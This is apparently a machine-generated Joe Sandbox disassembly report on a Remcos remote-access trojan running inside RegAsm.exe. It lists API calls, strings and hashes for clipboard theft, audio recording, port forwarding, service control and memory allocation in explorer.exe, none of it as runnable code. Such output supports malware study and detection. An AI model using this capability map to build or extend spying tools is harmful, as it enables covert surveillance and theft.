                          • Opcode ID: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                          • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                          • Opcode Fuzzy Hash: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                          • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                          APIs
                            • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                          • CloseHandle.KERNEL32(00000000), ref: 00417E20
                          • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                          • String ID: 0VG$0VG$<$@$Temp
                          • API String ID: 1704390241-2575729100
                          • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                          • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                          • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                          • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                          APIs
                          • OpenClipboard.USER32 ref: 0041697C
                          • EmptyClipboard.USER32 ref: 0041698A
                          • CloseClipboard.USER32 ref: 00416990
                          • OpenClipboard.USER32 ref: 00416997
                          • GetClipboardData.USER32 ref: 004169A7
                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                          • CloseClipboard.USER32 ref: 004169BF
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                          • String ID: !D@
                          • API String ID: 2172192267-604454484
                          • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                          • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                          • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                          • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          • API String ID: 221034970-0
                          • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                          • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                          • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                          • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                          APIs
                          • _free.LIBCMT ref: 100059EA
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100059F6
                          • _free.LIBCMT ref: 10005A01
                          • _free.LIBCMT ref: 10005A0C
                          • _free.LIBCMT ref: 10005A17
                          • _free.LIBCMT ref: 10005A22
                          • _free.LIBCMT ref: 10005A2D
                          • _free.LIBCMT ref: 10005A38
                          • _free.LIBCMT ref: 10005A43
                          • _free.LIBCMT ref: 10005A51
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                          • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                          • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                          • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                          APIs
                          • _free.LIBCMT ref: 004481B5
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 004481C1
                          • _free.LIBCMT ref: 004481CC
                          • _free.LIBCMT ref: 004481D7
                          • _free.LIBCMT ref: 004481E2
                          • _free.LIBCMT ref: 004481ED
                          • _free.LIBCMT ref: 004481F8
                          • _free.LIBCMT ref: 00448203
                          • _free.LIBCMT ref: 0044820E
                          • _free.LIBCMT ref: 0044821C
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                          • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                          • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Eventinet_ntoa
                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                          • API String ID: 3578746661-3604713145
                          • Opcode ID: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                          • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                          • Opcode Fuzzy Hash: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                          • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                          APIs
                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer
                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                          • API String ID: 3527080286-3064271455
                          • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                          • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                          • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                          • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                          • Sleep.KERNEL32(00000064), ref: 0041755C
                          • DeleteFileW.KERNEL32(00000000), ref: 00417590
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreateDeleteExecuteShellSleep
                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                          • API String ID: 1462127192-2001430897
                          • Opcode ID: e113b56b21605da8d413aa31776797b2f5429e31524f400d16683b1a7354063e
                          • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                          • Opcode Fuzzy Hash: e113b56b21605da8d413aa31776797b2f5429e31524f400d16683b1a7354063e
                          • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                          APIs
                          • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CurrentProcess
                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                          • API String ID: 2050909247-4242073005
                          • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                          • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                          • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                          • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                          APIs
                          • _strftime.LIBCMT ref: 00401D50
                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                          • API String ID: 3809562944-243156785
                          • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                          • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                          • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                          • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                          • int.LIBCPMT ref: 00410EBC
                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                          • __Init_thread_footer.LIBCMT ref: 00410F64
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                          • String ID: ,kG$0kG
                          • API String ID: 3815856325-2015055088
                          • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                          • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                          • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                          • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                          APIs
                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                          • waveInStart.WINMM ref: 00401CFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                          • String ID: dMG$|MG$PG
                          • API String ID: 1356121797-532278878
                          • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                          • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                          • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                          • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                          • TranslateMessage.USER32(?), ref: 0041D57A
                          • DispatchMessageA.USER32(?), ref: 0041D584
                          • GetMessageA.USER32 ref: 0041D591
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                          • String ID: Remcos
                          • API String ID: 1970332568-165870891
                          • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                          • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                          • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                          • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                          • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                          APIs
                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                          • __alloca_probe_16.LIBCMT ref: 00454014
                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                          • __freea.LIBCMT ref: 00454083
                          • __freea.LIBCMT ref: 0045408F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                          • String ID:
                          • API String ID: 201697637-0
                          • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                          • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                          • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                          • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • _memcmp.LIBVCRUNTIME ref: 004454A4
                          • _free.LIBCMT ref: 00445515
                          • _free.LIBCMT ref: 0044552E
                          • _free.LIBCMT ref: 00445560
                          • _free.LIBCMT ref: 00445569
                          • _free.LIBCMT ref: 00445575
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorLast$_abort_memcmp
                          • String ID: C
                          • API String ID: 1679612858-1037565863
                          • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                          • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                          • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                          • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: tcp$udp
                          • API String ID: 0-3725065008
                          • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                          • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                          • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                          • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 004018BE
                          • ExitThread.KERNEL32 ref: 004018F6
                          • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                          • String ID: PkG$XMG$NG$NG
                          • API String ID: 1649129571-3151166067
                          • Opcode ID: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                          • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                          • Opcode Fuzzy Hash: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                          • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                          APIs
                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • CloseHandle.KERNEL32(00000000), ref: 00407A88
                          • MoveFileW.KERNEL32 ref: 00407AA5
                          • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                          • String ID: .part
                          • API String ID: 1303771098-3499674018
                          • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
